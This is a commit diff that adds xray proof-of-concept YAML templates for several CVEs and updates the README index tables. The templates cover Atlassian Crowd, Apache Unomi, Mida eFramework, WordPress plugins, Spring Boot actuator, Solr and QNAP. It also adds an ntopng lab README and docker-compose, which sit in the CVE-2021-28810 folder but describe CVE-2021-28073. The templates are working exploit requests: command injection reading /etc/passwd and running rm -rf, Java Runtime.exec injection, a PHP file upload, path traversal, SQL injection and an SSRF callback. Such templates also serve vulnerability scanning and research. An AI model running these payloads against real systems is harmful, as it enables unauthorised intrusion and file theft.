add some xray poc

2019/CVE-2019-11580/poc/xray/atlassian-crowd-cve-2019-11580.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-atlassian-crowd-cve-2019-11580
+set:
+  r1: randomLowercase(8)
+  r2: randomLowercase(4)
+rules:
+  - method: GET
+    path: /crowd/admin/uploadplugin.action
+    expression: |
+      response.status == 400
+  - method: POST
+    path: /crowd/admin/uploadplugin.action
+    headers:
+      Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
+    body: |-
+      ------------------------------f15fe87e95a7
+      Content-Disposition: form-data; name="file_cdl"; filename="{{r2}}.jar"
+      Content-Type: application/octet-stream
+      {{r1}}
+      ------------------------------f15fe87e95a7--
+    expression: |
+      response.status == 500
+detail:
+  author: mumu0215(https://github.com/mumu0215)
+  links:
+    - https://github.com/jas502n/CVE-2019-11580 

2019/README.md

@@ -19,7 +19,7 @@
 | CVE-2019-11013 |  | 路径遍历 | 6.5 | N | [Y](CVE-2019-11013/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2019-11013/poc/others/) |
 | CVE-2019-11248 | kubernetes | 信息泄露 | 8.2 | N | [Y](CVE-2019-11248/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2019-11248/poc/others/) |
 | CVE-2019-11510 | pulsesecure VPN | 目录穿越 | 10 | N | [Y](CVE-2019-11510/poc/nuclei/) | [Y](CVE-2019-11510/poc/xray/) | N | N | N | N | [Y](CVE-2019-11510/poc/others/) |
-| CVE-2019-11580 |  | 输入验证错误 | 9.8 | N | [Y](CVE-2019-11580/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2019-11580/poc/others/) |
+| CVE-2019-11580 |  | 输入验证错误 | 9.8 | N | [Y](CVE-2019-11580/poc/nuclei/) | [Y](CVE-2019-11580/poc/xray/) | N | N | N | N | [Y](CVE-2019-11580/poc/others/) |
 | CVE-2019-11581 | JIRA | 命令执行 | 9.8 | [Y](CVE-2019-11581/vultarget/) | [Y](CVE-2019-11581/poc/nuclei/) | [Y](CVE-2019-11581/poc/xray/) | N | N | N | N | [Y](CVE-2019-11581/poc/others/) |
 | CVE-2019-11869 |  | 跨站脚本 | 6.1 | N | [Y](CVE-2019-11869/poc/nuclei/) | N | N | N | N | N | N |
 | CVE-2019-12276 |  | 路径遍历 | 7.5 | N | [Y](CVE-2019-12276/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2019-12276/poc/others/) |

2020/CVE-2020-13942/poc/xray/unomi-rce-cve-2020-13942.yml

@@ -0,0 +1,39 @@
+name: poc-yaml-unomi-rce-cve-2020-13942
+transport: http
+set:
+    f1: randomInt(800000000, 900000000)
+    f2: randomInt(800000000, 900000000)
+    id: randomLowercase(20)
+    session: randomLowercase(20)
+rules:
+    r1:
+        request:
+            method: POST
+            path: "/context.json"
+            headers:
+                Content-Type: application/json
+            body: |-
+                {
+                    "filters": [
+                        {
+                            "id": "{{id}}",
+                            "filters": [
+                                {
+                                    "condition": {
+                                         "parameterValues": {
+                                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"expr {{f1}}+{{f2}}\");"
+                                        },
+                                        "type": "profilePropertyCondition"
+                                    }
+                                }
+                            ]
+                        }
+                    ],
+                    "sessionId": "{{session}}"
+                }
+        expression: response.status == 200 && response.body.bcontains(bytes(string(id))) && response.body.bcontains(bytes(string(session)))
+expression: r1()
+detail:
+    author: 曦shen
+    links:
+        - https://github.com/vulhub/vulhub/blob/master/unomi/CVE-2020-13942/README.zh-cn.md

2020/CVE-2020-15920/poc/xray/mida-solutions-eframework-cve-2020-15920-rce.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-mida-solutions-eframework-cve-2020-15920-rce
+rules:
+  - method: POST
+    path: /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
+    expression: |
+      response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: x1n9Qi8
+  links:
+    - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202007-1517
+    - https://cxsecurity.com/issue/WLB-2020080155

2020/CVE-2020-25213/poc/xray/wordpress-wp-file-manager-rce-cve-2020-25213.yml

@@ -0,0 +1,37 @@
+name: poc-yaml-wordpress-wp-file-manager-rce-cve-2020-25213
+set:
+  r1: randomLowercase(8)
+rules:
+  - method: GET
+    path: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("errUnknownCmd"))
+  - method: POST
+    path: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
+    follow_redirects: true
+    headers:
+      Content-Type: multipart/form-data; boundary=f9d5f22616749d6004d075298034bdd0
+    body: |
+      --f9d5f22616749d6004d075298034bdd0
+      Content-Disposition: form-data; name="cmd"
+      upload
+      --f9d5f22616749d6004d075298034bdd0
+      Content-Disposition: form-data; name="target"
+      l1_
+      --f9d5f22616749d6004d075298034bdd0
+      Content-Disposition: form-data; name="upload[0]"; filename="{{r1}}.php"
+      <?php echo md5("{{r1}}");unlink(__FILE__);?>
+      --f9d5f22616749d6004d075298034bdd0--
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(r1))
+    search: |
+      "name":"(?P<filename>.+?)","phash"
+  - method: GET
+    path: /wp-content/plugins/wp-file-manager/lib/files/{{filename}}
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(r1)))
+detail:
+  author: Print1n(http://print1n.top)
+  links:
+    - https://www.cnblogs.com/Salvere-Safe/p/14995249.html

2020/README.md

@@ -37,7 +37,7 @@
 | CVE-2020-13700 | WordPress | 其他 | 7.5 | N | [Y](CVE-2020-13700/poc/nuclei/) | N | N | N | N | N | N |
 | CVE-2020-13927 | Apache-Airflow | 默认配置问题 | 9.8 | N | [Y](CVE-2020-13927/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-13927/poc/others/) |
 | CVE-2020-13937 | Apache-kylin | 未授权访问 | 5.3 | N | [Y](CVE-2020-13937/poc/nuclei/) | [Y](CVE-2020-13937/poc/xray/) | N | N | [Y](CVE-2020-13937/poc/goby/) | N | [Y](CVE-2020-13937/poc/others/) |
-| CVE-2020-13942 | Apache Unomi | 命令执行 | 9.8 | [Y](CVE-2020-13942/vultarget/) | [Y](CVE-2020-13942/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-13942/poc/others/) |
+| CVE-2020-13942 | Apache Unomi | 命令执行 | 9.8 | [Y](CVE-2020-13942/vultarget/) | [Y](CVE-2020-13942/poc/nuclei/) | [Y](CVE-2020-13942/poc/xray/) | N | N | N | N | [Y](CVE-2020-13942/poc/others/) |
 | CVE-2020-14092 | WordPress | SQL注入 | 9.8 | N | [Y](CVE-2020-14092/poc/nuclei/) | N | N | N | N | N | N |
 | CVE-2020-14179 | JIRA | 其他 | 5.3 | N | [Y](CVE-2020-14179/poc/nuclei/) | [Y](CVE-2020-14179/poc/xray/) | N | N | N | N | [Y](CVE-2020-14179/poc/others/) |
 | CVE-2020-14181 | Atlassian Jira | 其他 | 5.3 | N | [Y](CVE-2020-14181/poc/nuclei/) | [Y](CVE-2020-14181/poc/xray/) | N | N | [Y](CVE-2020-14181/poc/goby/) | N | [Y](CVE-2020-14181/poc/others/) |
@@ -52,7 +52,7 @@
 | CVE-2020-15500 |  | 跨站脚本 | 6.1 | N | [Y](CVE-2020-15500/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-15500/poc/others/) |
 | CVE-2020-15505 | MobileIron | 其他 | 9.8 | N | [Y](CVE-2020-15505/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-15505/poc/others/) |
 | CVE-2020-15568 | TerraMaster-系统管理 | 输入验证错误 | 9.8 | N | [Y](CVE-2020-15568/poc/nuclei/) | [Y](CVE-2020-15568/poc/xray/) | N | N | N | N | N |
-| CVE-2020-15920 | Mida eFramework | 操作系统命令注入 | 9.8 | N | [Y](CVE-2020-15920/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-15920/poc/others/) |
+| CVE-2020-15920 | Mida eFramework | 操作系统命令注入 | 9.8 | N | [Y](CVE-2020-15920/poc/nuclei/) | [Y](CVE-2020-15920/poc/xray/) | N | N | N | N | [Y](CVE-2020-15920/poc/others/) |
 | CVE-2020-16139 |  | 输入验证错误 | 7.5 | N | [Y](CVE-2020-16139/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-16139/poc/others/) |
 | CVE-2020-16846 | saltstack-web | 授权问题 | 9.8 | [Y](CVE-2020-16846/vultarget/) | [Y](CVE-2020-16846/poc/nuclei/) | [Y](CVE-2020-16846/poc/xray/) | N | N | N | N | [Y](CVE-2020-16846/poc/others/) |
 | CVE-2020-16952 | Microsoft-SharePoint | 其他 | 7.8 | N | [Y](CVE-2020-16952/poc/nuclei/) | N | N | N | N | N | N |
@@ -90,7 +90,7 @@
 | CVE-2020-24912 |  | 跨站脚本 | 6.1 | N | [Y](CVE-2020-24912/poc/nuclei/) | N | N | N | N | N | N |
 | CVE-2020-24949 |  | 其他 | 8.8 | N | [Y](CVE-2020-24949/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-24949/poc/others/) |
 | CVE-2020-25078 | D-Link-DCS-prod | 其他 | 7.5 | N | [Y](CVE-2020-25078/poc/nuclei/) | [Y](CVE-2020-25078/poc/xray/) | N | N | N | N | [Y](CVE-2020-25078/poc/others/) |
-| CVE-2020-25213 | WordPress | 命令执行 | 9.8 | N | [Y](CVE-2020-25213/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-25213/poc/others/) |
+| CVE-2020-25213 | WordPress | 命令执行 | 9.8 | N | [Y](CVE-2020-25213/poc/nuclei/) | [Y](CVE-2020-25213/poc/xray/) | N | N | N | N | [Y](CVE-2020-25213/poc/others/) |
 | CVE-2020-25223 | Sophos SG UTM | 代码注入 | 9.8 | N | [Y](CVE-2020-25223/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-25223/poc/others/) |
 | CVE-2020-25495 |  | 跨站脚本 | 6.1 | N | [Y](CVE-2020-25495/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2020-25495/poc/others/) |
 | CVE-2020-25506 | D-LINK | 命令注入 | 9.8 | N | [Y](CVE-2020-25506/poc/nuclei/) | N | N | N | N | N | N |

2021/CVE-2021-21234/poc/xray/spring-boot-actuator-logview-read-file-cve-2021-21234.yml

@@ -0,0 +1,26 @@
+name: poc-yaml-spring-boot-actuator-logview-read-file-cve-2021-21234
+groups:
+  linux1:
+    - method: GET
+      path: /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+  linux2:
+    - method: GET
+      path: /log/view?filename=/etc/passwd&base=../../../../../../../../../../
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+  Windows1:
+    - method: GET
+      path: /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
+      expression: |
+        response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+  Windows2:
+    - method: GET
+      path: /log/view?filename=/windows/win.ini&base=../../../../../../../../../../
+      expression: |
+        response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+detail:
+  author: fuzz7j(https://github.com/fuzz7j)
+  links:
+    - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234

2021/CVE-2021-24285/poc/xray/wordpress-plugins-cars-seller-auto-classifieds-script-cve-2021-24285-sqli.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-wordpress-plugins-cars-seller-auto-classifieds-script-cve-2021-24285-sqli
+rules:
+  - method: POST
+    path: "/wp-admin/admin-ajax.php"
+    body: action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,md5(89757),NULL,NULL,NULL,NULL,NULL,NULL-- -
+    expression: response.body.bcontains(b"7294a8e1350ed4228c575b9ab855de30")
+detail:
+  author: z1Ro0丶
+  links:
+    - https://idc.wanyunshuju.com/aqld/2177.html

2021/CVE-2021-27905/poc/xray/solr-cve-2021-27905-ssrf.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-solr-cve-2021-27905-ssrf
+manual: true
+transport: http
+set:
+    reverse: newReverse()
+    reverseURL: reverse.url
+rules:
+  - method: GET
+    path: "/solr/admin/cores?indexInfo=false&wt=json"
+    expression: |
+      response.status == 200 
+    search: >-
+      "name":"(?P<name>.+?)"
+  - method: POST
+    path: "/solr/{{name}}/replication/?command=fetchindex&masterUrl={{reverseURL}}"
+    expression: |
+      reverse.wait(5)
+detail:
+    author: txf(https://github.com/tangxiaofeng7)
+    links:
+        - https://github.com/murataydemir/CVE-2021-27905

2021/CVE-2021-28073/poc/xray/ntopng-cve-2021-28073.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-ntopng-cve-2021-28073
+manual: true
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /
+            follow_redirects: false
+        expression: response.status == 302 && response.headers['Location'].contains("/lua/login.lua?referer=")
+expression: r0()
+detail:
+    author: Beard_Lin
+    links:
+        - https://github.com/errorecho/CVEs-Collection/blob/main/CVE-2021-28073

2021/CVE-2021-28810/poc/xray/qnap-cve-2021-28810.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-qnap-cve-2021-28810
+set:
+  rand: randomInt(1000, 9999)
+  r1: randomLowercase(4)
+rules:
+  - method: GET
+    path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`cat%20/etc/passwd%20>{{r1}}`
+    headers:
+      cookie: NAS_USER={{rand}}
+    expression: |
+      response.status == 200 && !response.body.bcontains(b"not logged in")
+  - method: GET
+    path: /cgi-bin/qpkg/RoonServer/ajax/{{r1}}
+    expression: |
+      response.status == 200 && response.body.bcontains(b"admin:x:0:0")
+  - method: POST
+    path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`rm%20-rf%20{{r1}}`
+    headers:
+      cookie: NAS_USER={{rand}}
+    expression: |
+      response.status == 200 && !response.body.bcontains(b"not logged in")
+detail:
+  author: albertchang
+  links:
+    - https://mp.weixin.qq.com/s/xfT3LkYNlzFYJdG1z0c7ug

2021/CVE-2021-28810/vultarget/README.md

@@ -0,0 +1,47 @@
+# ntopng Authentication Bypass (CVE-2021-28073)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server.
+
+There is a authentication bypass vulnerability in ntopng 4.2 and previous versions.
+
+Reference link:
+
+- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
+
+## Vulnerability Environment
+
+Execute the following command to start ntopng:
+
+```
+docker-compose up -d
+```
+
+After the server is started, browse the `http://your-ip:3000` to see the login page, whose default password is admin/admin, and the password will be request to reset for the first login.
+
+## Vulnerability Reproduce
+
+According to the reference link and the simple [poc.py](poc.py), calculate the length of the ntopng lua directory:
+
+```
+python poc.py --url http://your-ip:3000/ baselength
+```
+
+![](1.png)
+
+It can be seen that the path length in the Vulhub container is 36.
+
+Then, browse the page or interface that we want to access without authorization, such as `/lua/find_prefs.lua`, and it will be redirected to the login page.
+
+Use POC to generate unauthorized access URL:
+
+```
+python poc.py --url http://your-ip:3000/ generate -l 36 -p find_prefs.lua
+```
+
+![](2.png)
+
+The interface is able to access without authorization through this URL:
+
+![](3.png)

2021/CVE-2021-28810/vultarget/README.zh-cn.md

@@ -0,0 +1,45 @@
+# ntopng权限绕过漏洞（CVE-2021-28073）
+
+ntopng是监控服务器网络流量的工具，对外提供Web页面。其4.2及以前的版本中存在一处权限绕过漏洞，利用该漏洞可以未授权访问目标任意接口。
+
+参考链接：
+
+- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
+
+## 漏洞环境
+
+执行如下命令启动ntopng：
+
+```
+docker-compose up -d
+```
+
+环境启动后，访问`http://your-ip:3000`将被跳转到登录页面，默认密码admin/admin，首次登录将会重设密码。
+
+## 漏洞复现
+
+根据参考链接中的方法，编写一个简单的[poc.py](poc.py)。首先，计算出ntopng lua目录的长度：
+
+```
+python poc.py --url http://your-ip:3000/ baselength
+```
+
+![](1.png)
+
+可见，Vulhub靶场中的长度为36。
+
+然后，找到我们想要越权访问的页面或接口，比如`/lua/find_prefs.lua`，正常访问时会302跳转到登录页面，无权限。
+
+使用POC生成越权访问URL：
+
+```
+python poc.py --url http://your-ip:3000/ generate -l 36 -p find_prefs.lua
+```
+
+![](2.png)
+
+访问这个URL，发现可以越权返回正常信息：
+
+![](3.png)
+
+后续更深入的利用方法，可以自行修改poc.py利用。

2021/CVE-2021-28810/vultarget/docker-compose.yml

@@ -0,0 +1,12 @@
+version: '2'
+services:
+ ntopng:
+   image: vultarget/ntopng_authentication_bypass-cve_2021_28073:4.2
+   depends_on:
+    - redis
+   ports:
+    - "3000:3000"
+   environment:
+    REDIS_SERVER: redis:6379
+ redis:
+   image: redis:6.2-alpine